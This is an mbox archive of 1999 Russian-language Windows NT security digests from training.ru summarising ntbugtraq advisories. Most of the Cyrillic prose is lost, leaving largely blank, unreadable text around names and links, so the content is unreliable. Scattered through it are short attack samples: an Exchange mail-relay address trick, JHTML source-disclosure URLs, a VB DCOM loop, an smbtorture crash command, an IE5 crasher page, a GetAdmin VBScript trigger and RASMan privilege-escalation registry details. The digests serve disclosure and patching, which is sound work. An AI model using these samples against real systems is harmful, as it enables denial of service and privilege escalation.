" "    dialer.ini. ,  
-    Phone Dialer,     
   .   ,  
   dialer.ini

http://www.arca.com
http://www.infowar.co.uk/mnemonix

  ,   .

http://www.microsoft.com/security/bulletins/MS99-026.asp
http://www.microsoft.com/security/bulletins/MS99-026faq.asp
http://support.microsoft.com/support/kb/articles/q237/1/85.asp.

3.      
 SP5

Clark Lebarge <LClark@HEINZE-INSTITUTE.COM> (ntbugtraq)  
.       AddWorkstation, 
        .  
  SP3  SP4 ,    ,  
    . ,   SP5  
.   ,     
      .

4.     AT

foxthree@INAME.COM (ntbugtraq) ,     
 ( 142 ) AT  ( Dr.Watson).

5.   

Bill Stout <Bill.Stout@ARISTASOFT.COM> (ntbugtraq)   
,    .

http://www.mcpmag.com/members/99aug/col3main.asp

http://www.microsoft.com/ntserver/terminalserver/deployment/MAP/
implpol.asp

http://www.microsoft.com/ntserver/terminalserver/downloads/
admintools/TermServZAK.asp

http://www.sans.org/newlook/publications/ntstep.htm

http://www.trustedsystems.com/MSWhitePaper.htm

http://www.microsoft.com/security/resources/
whitepapers.asp?ID=42&Parent=6

6.   MS Office 97

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
   ODBC Jet 3.51 (ODBCJT32.DLL),  
      MS Excel 97 Worksheet. 
   Jet 4.0,    MDAC 2.1.

    ,  
 .

7. Back Orifice 2000 scanner

"Wayne@DiamondCS.com.au" <wayne@DIAMONDCS.COM.AU> 
(ntbugtraq) ,  Diamond Computer Systems Pty. Ltd. 
(http://www.diamondcs.com.au)     
 Back Orifice 2000. 

"AK Secure" <Alerta@redsegura.com> (ntsecurity, iss)   
  AK Secure

http://redsegura.com/bo2k/BO2Klean-eng.exe


From rudnyi Mon Aug  9 10:46:10 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA23734
	for rudnyi@comp.chem.msu.su; Mon, 9 Aug 1999 10:46:09 +0400 (MSD)
Date: Mon, 9 Aug 1999 10:46:09 +0400 (MSD)
Message-Id: <199908090646.KAA23734@comp.chem.msu.su>
Subject: digest 30.7-5.8.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

30  - 5  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. "Confirm open after download"  MS Office 
97

Jimmy Guse <guse1@ix.netcom.com> (ntbugtraq)    
  "Confirm open after download"   DocObjects 
MS Office 97.    

http://ntbugtraq.ntadvice.com/office97fix.asp

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
   

http://www.microsoft.com/security/Issues/OfficeDocOpenTool.asp

   ,    Jimmy Guse.

2.    Exchange

Laurent Frinking <lfrinking@quark.de> (ntbugtraq) ,   
  (relay mail)  Exchange-,   
  ,   .

        ,   
 To: 

<IMCEASMTP-user+40destinationdomain+2Ecom@domain-you-wish-to-use-
as-relay.com>

Exchange  ,     
,        
<user@destinationdomain.com>    .

  ,   

http://www.microsoft.com/security/bulletins/ms99-027.asp

 .      

http://training.ru/security/Library/MSSB/

3. Netscape Enterprise Server  
  JHTML

"Mnemonix" <mnemonix@globalnet.co.uk> (ntsecurity, iss)  
. JHTML -     ,   
 ASP    Netscape Enterprise Server.    
      JHTML.  
   3.5.1    3.6.

 Netscape Enterprise Server    ,    
     .   
  

http://no-such-server/search?NS-search-page=results&NS-query=A&NS-
collection=B&NS-tocrec-pat=/text/HTML-tocrec-demo1.pat

http://no-such-server/search?NS-search-page=document&NS-rel-doc-
name=/path/to/indexed/file.jhtml&NS-query=URI!=''&NS-collection=A

     JHTML.

 -    JHTML  ,    
 .

  

http://www.arca.com
http://www.infowar.co.uk/mnemonix

4.     
 

Michael Collis <mike@APPLIED-INSIGHT.CO.NZ> (ntbugtraq)   
  NAI GroupShield for Exchange,     
   .   

http://www.infoworld.com/cgi-bin/displayStory.pl?99084.ennai.htm

NAI  ,      .


From rudnyi Sun Aug 15 23:31:14 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id XAA01329
	for rudnyi@comp.chem.msu.su; Sun, 15 Aug 1999 23:31:14 +0400 (MSD)
Date: Sun, 15 Aug 1999 23:31:14 +0400 (MSD)
Message-Id: <199908151931.XAA01329@comp.chem.msu.su>
Subject: digest 6-12.8.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

6 - 12  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. ICMP Router Discovery Protocol

NTSD Publisher <security@NTSECURITY.NET>   ,   
  L0pht,  ICMP Router Discovery Protocol 
(IRDP).      Windows,  
       " man-in-the-
middle", "  "     . ,   
    

http://www.ntsecurity.net/go/load.asp?iD=/security/irdp.htm

    L0pht.

2.      
 

 X-Force <xforce@ISS.NET>, http://xforce.iss.net/ (ntbugtraq) 
 ,        
  .     ,  
       3389. 
 TCP       , 
        . 
        . 
,       
 TCP   3389.

 -       
   3389.

  

http://www.microsoft.com/security/bulletins/ms99-028.asp.

 

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40tse/hotfixes
-postSP4/Flood-fix/

 .      

http://training.ru/security/Library/MSSB/

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq) ,  
    1  . ,   
    1     
,     ,   
 50 .   ,   ,   
       .

3. VBS/Monopoly

Patrick Mannion <patrick.mannion@US.SOCGEN.COM> (ntbugtraq)  
  ,       
  Visual Basic Script.  -    
MONOPOLY.VBS.

   .

http://vil.nai.com/vil/vbs10234.asp
http://www.uk.sophos.com/downloads/ide/monopoly.ide

4.  "  "  IIS 
4.0.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
 

http://www.microsoft.com/security/bulletins/MS99-029.asp
http://www.microsoft.com/security/bulletins/MS99-029faq.asp
http://support.microsoft.com/support/kb/articles/q238/3/49.asp

      IIS 4.0.

 .      

http://training.ru/security/Library/MSSB/

Alastair Carey , ,  ,     
  .  

ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/
HDBRK-fix/

    Microsoft Product Security Response Team 
<secure@MICROSOFT.COM> (ntbugtraq) ,    
      .   
  .



From rudnyi Fri Aug 27 15:00:11 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id PAA25752
	for rudnyi@comp.chem.msu.su; Fri, 27 Aug 1999 15:00:11 +0400 (MSD)
Date: Fri, 27 Aug 1999 15:00:11 +0400 (MSD)
Message-Id: <199908271100.PAA25752@comp.chem.msu.su>
Subject: digest 13-26.8.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

13  26  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.   LSA  NT SP5

"Galipeau, William" William.Galipeau@FMR.COM (ntbugtraq) ,  
 NT c  SP5 -     
ɔ  LSASS.EXE.      
-  Network Associates Cyber Cop version 5.0.

"Sosnosky,Lara M." lara@MITRE.ORG (ntbugtraq) ,    
   post-SP5 LSA3.

2.     Excel

Russ Russ.Cooper@RC.ON.CA (ntbugtraq)      
 Excel,  Juan Carlos Garcia Cuartango. 
    

http://www.securityfocus.com/level2/
?go=vulnerabilities&id=548

     Excel "Get External Data" Microsoft 
Query,    SQL SELECT,    
    (shell),    
    ,     
     .

      HTML SRC=,     
  Excel,       . 
  Excel  ,      Excel,  
 IE   Office '97,     
  IE.

 FXRGCONF.exe

http://ntbugtraq.ntadvice.com/
default.asp?pid=55&did=32

      Excel,  
.    Outlook/Outlook Express,   
HTML ,     .

,   ,    Excel,   ODBC 3.51 
 3.5. 

       CMD.EXE  
COMMAND.COM,   .

  ,   .

http://www.microsoft.com/security/bulletins/
ms99-030.asp

     Excel 2000  Excel '97.

http://officeupdate.microsoft.com/isapi/
gooffupd.asp?TARGET=/downloaditems/JetCopkg.exe

http://officeupdate.microsoft.com/isapi/
gooffupd.asp?TARGET=/2000/downloaditems/JetCopkg.exe

 .      

http://training.ru/security/Library/MSSB/

 Juan Carlos Garcia Cuartango cuartangojc@MX3.REDESTB.ES 
(ntbugtraq) ,       Jet 4.0 (ODBCJT32.DLL, 
  MS Office 2000  MDAC 2.1),       
 Word,    Excel.

3.   DCOM

Rob Lempke <rlempke@ADNET2000.COM> (ntbugtraq) ,  
   20  Excel     
  .

Private Sub Command1_Click()
    Dim xlObj As Object
    Dim xlCollection As New Collection
    Dim i As Long
    For i = 1 To 20
        Set xlObj = 
CreateObject("Excel.Application", "\\NTBox")
        xlCollection.Add xlObj
    Next i

    i = 1
    'clean up
    While xlCollection.Count > 0
        xlCollection.Remove (xlCollection.Count)
    Wend
    Set xlCollection = Nothing
End Sub

     -,  - ,  
- . ,      DCOM,   ,  
         
 .  , ,  .

4.    IE5

Georgi Guninski joro@NAT.BG (ntbugtraq)     
IE5. 

    ( )

http://www.nat.bg/~joro/scrtlb.html

    

"Script ActiveX controls marked safe for scripting"

      

http://www.ntsecurity.net/go/load.asp?iD=/security/
ie51.htm

5.     Java

Russ Russ.Cooper@RC.ON.CA (ntbugtraq)     


http://www.microsoft.com/security/bulletins/
MS99-031.asp
http://www.microsoft.com/security/bulletins/
MS99-031faq.asp
http://www.microsoft.com/java/vm/dl_vm32.htm
http://support.microsoft.com/support/kb/articles/
q240/3/46.asp

     Java,  
 Java      .

 .      

http://training.ru/security/Library/MSSB/

    

http://www.ntsecurity.net/go/load.asp?iD=/security/
jvm.htm

6.  HTML Internet Explorer 5.0

"Posick, Steve" steve.posick@ESPN.COM (ntbugtraq) ,   
  HTML Internet Explorer 5.0 (HTA)  
    .

   ,      
    VBScript,   .exe    
      StartUp.   IE 5  
 FileSystemObject Active X.   exe , 
   txt.  ,    
     HTA.   
        
 FileSystemObject.

         .HTA  
 MSHTA.exe.

7.      
 smbtorture

Marc DeBonis Marc.DeBonis@VT.EDU (ntbugtraq) ,   
    NT 4.0 Server    

smbtorture //machine/share RANDOMIPC

   Linux c  Samba 2.0.5.  
  ,      
  Guest       .

Luke Kenneth Casson Leighton lkcl@SWITCHBOARD.NET (ntbugtraq) 
,        IPS$ 
.

8.   SCM  NT

"Raymond P. Galloni" rpgallon@MITRE.ORG (ntbugtraq) ,  
   FullPrivilegeAuditing SCM  
   .inf    [Registry Values].

MACHINE\System\CurrentControlSet\Control\Lsa\
FullPrivilegeAuditing=3,31

 

MACHINE\System\CurrentControlSet\Control\Lsa\
FullPrivilegeAuditing=3,1

9.   NTFS     
4 

"Zumella, Bruno" Zumella_B@ADMIRAL.FR (ntbugtraq)   
   NTFS

DOCUMENT: Q229607
TITLE   : File Corruption on an NTFS Volume with 
More Than 4 Million Files
ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/nt40/Hotfixes-PostSP5/NTFS-fix/

  ,       
   ( 4 ).

10.    
 TCP  SP4

Roy Hills ntbugtraq-l@NTA-MONITOR.COM (ntbugtraq)  
     
TCP  NT SP4.    

http://www.nta-monitor.com/

11.     
 

Arne Vidstrom (ntbugtraq) ,    AspUpload  1.4  
Persits Software   ,     
(3800 ).     inetinfo. Peter Persits 
peter@PERSITS.COM ,       
 (http://www.AspUpload.com).

"Cunningham, Owen" Owen.Cunningham@FMR.COM (ntbugtraq) 
,    Compaq Insight Agents  
  PFCUser,     
 ,      
 .


From rudnyi Mon Sep  6 09:40:42 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id JAA24533
	for rudnyi@comp.chem.msu.su; Mon, 6 Sep 1999 09:40:42 +0400 (MSD)
Date: Mon, 6 Sep 1999 09:40:42 +0400 (MSD)
Message-Id: <199909060540.JAA24533@comp.chem.msu.su>
Subject: digest 27.8-2.9.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

27  - 2  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.    MS-CryptoAPI

Andrew Fernandes ,    ,   
  Windows NT, Windows 95  Windows 98   
    _NSAKey.

    

http://www.cryptonym.com/hottopics/msft-nsa.html

     http://www.ntsecurity.net  
http://ntbugtraq.ntadvice.com/

  DLL,  MS-CryptoAPI,   
  .    
,     MS-CryptoAPI 
(Cryptographic Service Provider, CSP))     , 
      .

Andrew Fernandes ,     , 
MS-CryptoAPI      _NSAKey.  
   ,      
 .   ,      
      Windows.

    .    
,    -    ,  
  ,      
.

    ,     , 
       . 
-   

http://www.cryptonym.com/hottopics/msft-nsa/ReplaceNsaKey.zip

,   ,    CSP    
Windows   .

2.    
   

Frank Heyne <fh@RCS.URZ.TU-DRESDEN.DE> (ntbugtraq) ,  
        
,         
 ,      
  ( 535).

3.  HTML    IE5  
Outlook Express 5

Neon Bunny <neonbunny@BUNNYBOX.NET> (ntbugtraq) ,  
  HTML    IE5  Outlook Express 5.  
  ,  IE5       
 HTML   HTML .

---{START SOURCE}---

<html>

<head>
  <title>NeonBunny's IE5 Crasher</title>
</head>

<body>

  <form method="POST">

    <table>
      <tr>
        <td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
      </tr>
    </table>

  </form>
</body>
</html>

---{STOP SOURCE}---

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
        Eudora.

4. Novell Client 4.6   Security

Clark Lebarge <LClark@HEINZE-INSTITUTE.COM> (ntbugtraq) , 
  ,    Novell Client 4.6,     
  Security  Explorer.

5. IE 5.0 Typelib scripting

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
  .   ,   
Georgi Guninski    ActiveX,    IE 
5.

http://www.microsoft.com/security/bulletins/MS99-032.asp

 .      

http://training.ru/security/Library/MSSB/

    

http://www.microsoft.com/security/bulletins/MS99-032faq.asp
ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/
http://support.microsoft.com/support/kb/articles/q240/3/08.asp

    

http://support.microsoft.com/support/kb/articles/q240/7/97.asp

        
  ActiveX.

http://support.microsoft.com/support/kb/articles/q240/7/97.asp

        

http://www.ntsecurity.net/go/load.asp?iD=/security/ie45-2.htm

6.     
 

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) ,   
  SoftArc (http://www.softarc.com) FirstClass Intranet 
Server            *.fc.

*************************************
   Sunbelt (www.sunbelt-software.com)

Microsoft  Intel   ,   64-bit Windows(R)   
    Merced  Intel.  
   Intel Developers Forum.    
,   ,     
     .



From rudnyi Wed Sep 15 09:14:20 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id JAA16894
	for rudnyi@comp.chem.msu.su; Wed, 15 Sep 1999 09:14:20 +0400 (MSD)
Date: Wed, 15 Sep 1999 09:14:20 +0400 (MSD)
Message-Id: <199909150514.JAA16894@comp.chem.msu.su>
Subject: digest 3-9.9.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

3 - 9  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

  ,      
 

http://training.ru/security/Library/MSSB/

1. GetAdmin   DCOM

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)  ,  
       
 Windows NT.    ,      
      .

       NT  ,    
 ,       
  . ,   Internet Explorer 
5,   System Event Notification (SENS),   
 ,    NTFS   
   .

,    ,     
   ,    .   
     SYSTEM,     
   .

       . 
    DCOM.   Interactive User  
   DCOM,     
HKCR\AppID. ,  Wordpad    

HKCR\AppID\{73FDDC80-AEA9-101A-98A7-00AA00374959}

    , "LocalService",    
,        
.

 ,         
VBScript

<SCRIPT LANGUAGE="VBScript">
CreateObject("Wordpad.Document.1")
</SCRIPT>

 Interactive User    DCOM launch. , 
RPCSS     "LocalService",   
Wordpad    SENS.

    

http://www.arca.com
http://www.infowar.co.uk/mnemonix

2.   IGMP

  ,     
IGMP.

   

http://www.microsoft.com/security/bulletins/MS99-034.asp
http://www.microsoft.com/security/bulletins/MS99-034faq.asp
http://support.microsoft.com/support/kb/articles/q238/3/29.asp

   

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-
postSP5/IGMP-fix/
ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/NT40TSE/hotfixes-postSP5/IGMP-fix/

3. Site Server GUID

  ,     
 (Cookies)  Site Server 3.0.     
 ,       
 .

   

http://www.microsoft.com/security/bulletins/MS99-035.asp
http://www.microsoft.com/security/bulletins/MS99-035faq.asp
http://support.microsoft.com/support/kb/articles/q238/6/47.asp

   

ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/
fixes/usa/siteserver3/Hotfixes-PostSP2/ProxyCache/

4.     
  

  ,   ,   
      ,  
   , ,  . 
 -    .

   

http://www.microsoft.com/security/bulletins/MS99-036.asp
http://www.microsoft.com/security/bulletins/MS99-036faq.asp
http://support.microsoft.com/support/kb/articles/q241/0/48.asp

5. IE5 "ImportExport Favorites"

  ,     
 IE5.    "Disable Active Scripting".

   

http://www.microsoft.com/security/bulletins/MS99-037.asp
http://www.microsoft.com/security/bulletins/MS99-037faq.asp

6.     
 

Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq) ,  
  MsgCore  Nosque     
   

HKEY_LOCAL_MACHINE\SOFTWARE\Nosque 
Workshop\MsgCore\vhDefault\AdmPasswd

    

c:\MsgCore\Data\Userbase.dbf



From rudnyi Mon Sep 20 10:14:07 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA23732
	for rudnyi@comp.chem.msu.su; Mon, 20 Sep 1999 10:14:06 +0400 (MSD)
Date: Mon, 20 Sep 1999 10:14:06 +0400 (MSD)
Message-Id: <199909200614.KAA23732@comp.chem.msu.su>
Subject: digest 10-16.9.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

10 - 16  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

        


http://training.ru/security/Library/MSSB/

1. GetAdmin   Remote 
Access Service Manager

Quimeras <quimeras@TELELINE.ES> (ntbugtraq) ,   
       
Remote Access Service Manager       
  (%systemroot%\system32\rasman.exe)  
.        

http://www.teleline.es/personal/quimeras/ntsu
http://www.teleline.es/personal/quimeras/ntsu/rasmanbug/rasmanbug.htm

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
 BERTZHOLE.EXE     
 

HKLM/SYSTEM/CCS/Services/RASMan
ImagePath=

  ,        
.

Russ  , ,  ,      
       
 

Administrators=Full Control
System=Full Control
Everyone=Special Access...
  Query Value
  Create Subkey
  Enumerate Subkey
  Notify
  Read Control

      ,   RASMan

HKLM/Software/Microsoft/RASMan/CurrentVersion

Todd Sabin <tas@WEBSPAN.NET> (ntbugtraq) ,    
     .     
   .      Security.  
 RasMan    Dacl,   
Security\Security,  Everyone=Full Control.      
   .

2.   Netscape Enterprise 
Server

daniel <neophyte@SNICKERS.ORG> (ntbugtraq) ,   Netscape 
Enterprise Server 3.6sp2  FastTrack 3.01     
 ,      
 GET.      

http://xforce.iss.net/alerts/advise37.php3

  

http://www.beavuh.org/dox/win32_oflow.txt
http://www.cultdeadcow.com/cDc_files/cDc-351/

       Win32.

3.     
 

Simple Nomad <thegnome@NMRC.ORG> (www.nmrc.org) (ntbugtraq) 
,     Hackershield 
(http://www.bindview.com/products/HackerShield/),   
,       . 


From rudnyi Tue Sep 28 11:40:58 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id LAA04922
	for rudnyi@comp.chem.msu.su; Tue, 28 Sep 1999 11:40:58 +0400 (MSD)
Date: Tue, 28 Sep 1999 11:40:58 +0400 (MSD)
Message-Id: <199909280740.LAA04922@comp.chem.msu.su>
Subject: digest 17-23.9.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

17 - 23  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

        


http://training.ru/security/Library/MSSB/

1.       
,   

 Microsoft Product Security Response Team 
<secure@MICROSOFT.COM> (ntbugtraq)  ,  
   ,        
 secure@microsoft.com.   ,   
      .

2.    SP5

Les Landau <LandauL@OZEMAIL.COM.AU> (ntbugtraq) ,   
 SP5     ,  
   ,     RunOnce 
   (  
%systemroot%\system32\pstores.exe  csvroot.exe),   
    .

        
.    ,    SP5 
(,   SMS)       
.        
 -   ,  ,  , 
  . ,   
-   ,     
   .

  .

   SMS   SP5     
 %systemroot%\system32\pstores.exe  csvroot.exe   
.

3. GetAdmin   Remote 
Access Service Manager

   Alberto Rodriguez Aragones   ,  
       RASMAN.  
  Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq)  
  .

 GSD

http://www.bahnhof.se/~winnt/toolbox/gsd/

        .

 rasfix 

http://www.bahnhof.se/~winnt/toolbox/rasfix/

      RASMAN. ,  
,      RASMAN ,   
    RAS.

4. Windows IP source routing

 Security Research Labs <Security_Research_Labs@NAI.COM> 
(ntbugtraq)    ,   IP source routing. 
 ,        SP5,  
    source routing  
  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
 \Services\Tcpip\Parameters\DisableIPSourceRouting

     NAI http://www.nai.com.

    ,   
  .

http://www.microsoft.com/security/bulletins/MS99-038.asp
http://www.microsoft.com/security/bulletins/MS99-038faq.asp
http://support.microsoft.com/support/kb/articles/q238/4/53.asp
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes-
PostSP5/Spoof-fix

Russ Cooper,  ntbugtraq,    
 .

5.  IIS 4.0 HTTP/FTP

    ,   
  IIS 4.0   .

http://www.microsoft.com/security/bulletins/MS99-039.asp
http://www.microsoft.com/security/bulletins/MS99-039faq.asp
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/IIS40/
hotfixes-postSP6/security/IPRFTP-fix/

       

- - Combined FTP and Domain Restriction Security Patch for IIS 4.0,
  http://support.microsoft.com/support/kb/articles/q241/8/05.asp
- - Denying Access With Domain Name Restriction Still Allows
  Unresolved Clients,
  http://support.microsoft.com/support/kb/articles/q241/5/62.asp
- - Files can be downloaded from an FTP Server when the file
  permissions are explicitly No Access,
  http://support.microsoft.com/support/kb/articles/q241/4/07.asp

6.     
 

Cancer Omega <comega@ATTRITION.ORG>, 
http://www.attrition.org/security/ (ntbugtraq) ,   
Qualcomm's Eudora v3.x      
NAI PGP plug-in.  ,    
  :    
   PGP,      
. Aaron Lafferty <lafferty@OAR.NET> ,  
     Outlook Express 5.


From rudnyi Sat Oct  9 15:53:45 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id PAA20587
	for rudnyi@comp.chem.msu.su; Sat, 9 Oct 1999 15:53:45 +0400 (MSD)
Date: Sat, 9 Oct 1999 15:53:45 +0400 (MSD)
Message-Id: <199910091153.PAA20587@comp.chem.msu.su>
Subject: digest 24.9-7.10.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

24   7  1999 

        
ntbugtraq  ntsecurity (iss) (   - 
http://training.ru/security/).

        

http://training.ru/security/Library/MSSB/

1.     

Russ Russ.Cooper@RC.ON.CA (ntbugtraq)     
   .

      Active Scripting  IE5. 
,          
IE5.

http://www.microsoft.com/security/bulletins/
MS99-040.asp
http://www.microsoft.com/security/bulletins/
MS99-040faq.asp
http://support.microsoft.com/support/kb/articles/Q242/
5/42.asp

         


http://www.nat.bg/~joro/download2.html

http://www.securityfocus.com/templates/
archive.pike?list=1&date=1999-09-
22&msg=Pine.GSO.4.10.9909291213290.5201-
100000@www.securityfocus.com


        RASMAN, 
     .

http://www.microsoft.com/security/bulletins/
MS99-041.asp
http://www.microsoft.com/security/bulletins/
MS99-041faq.asp
http://support.microsoft.com/support/kb/articles/q242/
2/94.asp

 ,   

ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/nt40/Hotfixes-
PostSP6/Security/Rasman-fix/

      SP6,  SP6   .  
  ,  SP6    ,     
.

2.    

AS as@FUI.UNI-ERLANGEN.DE (ntbugtraq)    , 
  

http://www.phrack.com/
search.phtml?view&article=p55-5

"Paul Leach (Exchange)" paulle@EXCHANGE.MICROSOFT.COM  Matthew 
Mucker c0026836@AIRMAIL.NET ,     
    ,      , 
     .  
     .  , 
       ,   
  .

Felix Kasza felixk2@MVPS.ORG (ntbugtraq)    , 
   .

http://www.cmkrnl.com/arc-newint2e.html

Michael Siwinski siwinski@KODAK.COM (ntbugtraq)   
 ,         
 .

http://www.sarc.com/avcenter/venc/data/w32.bolzano.html

3.      
ActiveX

Shane Hird s.hird@STUDENT.QUT.EDU.AU (ntbugtraq)   
   ActiveX,     
   . 

Acrobat Control for ActiveX   - PDF.OCX       v1.3.188
Setupctl 1.0 Type Library     - SETUPCTL.DLL  v1, 1, 
0, 6
EYEDOG OLE Control module     - EYEDOG.OCX    
v1.1.1.75
MSN ActiveX Setup BBS Control - SETUPBBS.OCX  
v4.71.0.10
hhopen OLE Control Module     - HHOPEN.OCX    v1, 0, 
0, 1
RegWizCtrl 1.0 Type Library   - REGWIZC.DLL   v3, 0, 
0, 0

    ,    
    .

     .   
  

http://support.microsoft.com/support/kb/articles/q240/
7/97.asp

  ,     www.ntbugtraq.com,  
      .

4. Netscape Navigator     
HTTP

Arne Vidstrom winnt@BAHNHOF.SE (ntbugtraq)   
     Netscape 
Navigator.   IIS 4    
  Windows NT Challenge/Response,   
 HTTP   "WWW-Authenticate: NTLM". 
   Netscape Navigator    ,  
   (   
NTLM),         
    .

5.     
 

Arne Vidstrom winnt@BAHNHOF.SE (ntbugtraq) ,   
 Internet Anywhere Mail Server  
 .   ,  
    -   
 (http://www.bahnhof.se/~winnt/).


From rudnyi Mon Oct 25 10:22:54 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA27406
	for rudnyi@comp.chem.msu.su; Mon, 25 Oct 1999 10:22:53 +0400 (MSD)
Date: Mon, 25 Oct 1999 10:22:53 +0400 (MSD)
Message-Id: <199910250622.KAA27406@comp.chem.msu.su>
Subject: digest 8-21.10.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

8 - 21  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

        


http://training.ru/security/Library/MSSB/

1.   NT,    


Michael Collis <mike@APPLIED-INSIGHT.CO.NZ> (ntbugtraq)   
  Kaspersky Lab,     .

WWW: http://www.kasperskylab.ru, http://www.viruslist.com
FTP: ftp://ftp.kasperskylab.ru

Infis - ,    Windows NT 4.0  Service Packs 2, 3, 4, 5, 
6.      INF.SYS   
WinNT\System32\Drivers   

\Registry\Machine\System\CurrentControlSet\Services\inf
   Type = 1                          -   Windows NT
   Start = 2                    -    
   ErrorControl = 1              -     

,        
.         Windows NT  
      NT, 
    .      
  4608 ,  -   , 
, MSPAINT.EXE, CALC.EXE, CDPLAYER.EXE,  
.

  http://www.avp.ru       
 .

2.    "User Shell Folders"

Arne Vidstrom <winnt@BAHNHOF.SE> 
http://www.bahnhof.se/~winnt/toolbox/ (ntbugtraq)  ,   
    ,    
 .

 startup  "all users"   c:\Winnt\Profiles\All Users\Start 
Menu\Programs\Startup.      
( Administrators - Full Control, Everyone - Read  SYSTEM - Full 
Control).         

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\UserShell Folders\Common Startup

    .  , 
       
  startup  "all users"   .

 -      .

 bbl@AVENIR.NO (ntbugtraq) ,     
  

http://www.trustedsystems.com/NSAGuide.htm 
http://www.microsoft.com/security/products/iis/CheckListFurtherDetails.asp

3.     Jet

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
     MS99-030,   
     ODBC Jet,  Juan Cuartango.  
  Text I-ISAM Jet,   
   ,      
.

http://www.microsoft.com/security/bulletins/MS99-030.asp
http://www.microsoft.com/security/bulletins/MS99-030faq.asp



http://officeupdate.microsoft.com/articles/mdac_typ.htm

   

http://support.microsoft.com/support/kb/articles/q239/1/14.asp
http://support.microsoft.com/support/kb/articles/q172/7/33.asp
http://support.microsoft.com/support/kb/articles/q239/4/82.asp
http://support.microsoft.com/support/kb/articles/q239/1/04.asp
http://support.microsoft.com/support/kb/articles/q239/4/71.asp
